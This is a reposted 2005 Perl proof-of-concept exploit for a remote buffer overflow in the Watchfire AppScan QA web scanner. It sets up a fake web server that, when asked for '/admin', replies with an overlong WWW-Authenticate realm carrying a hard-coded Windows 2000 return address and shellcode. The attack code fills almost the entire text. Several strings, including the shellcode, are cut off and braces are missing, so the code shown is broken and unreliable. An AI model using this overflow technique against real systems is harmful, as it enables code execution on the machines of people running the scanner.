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Watchfire AppScan QA HTTP Response Handling Remote Buffer Overflow Exploit
来源:CYBSEC 作者:Mariano 发布时间:2005-12-16  

Watchfire AppScan QA HTTP Response Handling Remote Buffer Overflow Exploit

# Watchfire AppScan QA PoC - Coded by Mariano Nu馿z Di Croce @ CYBSEC
# How to use:
# 1. Run this script to setup the fake web server.
# 2. Scan the server with AppScan QA, either in Interactive or Manual mode.
# 3. If you get an "You are vulnerable!" popup, you should upgrade inmediatly.
# PoC developed for Windows 2000 Server SP4.

#!/usr/bin/perl -w

use IO::Socket::INET;

# Dissable buffering
$| = 1;

# Define 200 OK Responses
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov
2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\nKeep-Alive:
timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html;
charset=ISO-8859-1\r\n\r\n<a href='/admin'>admin</a>";

# Define the 401 Auth Required Header and Tail
my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\n
Date: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: Apache\r\nWWW-Authenticate:
Basic realm=\"";

my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\n
Connection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n
<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML2.0//EN\">\r\n<html><head>\r\n
<title>401 Authorization Required</title>\r\n</head><body>\r\n<h1>Authorization
Required</h1>\r\n<p>This server could not verify that you\r\nare authorized to access
the document\r\nrequested. Either you supplied the wrong\r\ncredentials (e.g., bad
password), or your\r\nbrowser doesn't understand how to supply\r\nthe credentials

# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);

my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb\x21\x02\x59\x7c\x51\xff\xd3

my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . "\"\r\n"
. $res401Tail;

# Initialization of Fake WebServer
my $srv = IO::Socket::INET->new(LocalPort => 80,
Reuse => 1,
Listen => 1 ) || die "Could not create socket: $!\n";

print "Waiting for connections...\n";

while ($cli = $srv->accept()) {
printf "Request from %s\n", $cli->peerhost;
while (<$cli>) {
if (s/(admin)/$1/) {
# If Request is for "admin", launch the exploit
printf "Request for protected resource detected...launching exploit\n";
print $cli $resExploit;
else {
# Else send a normal response
print $cli $res200;

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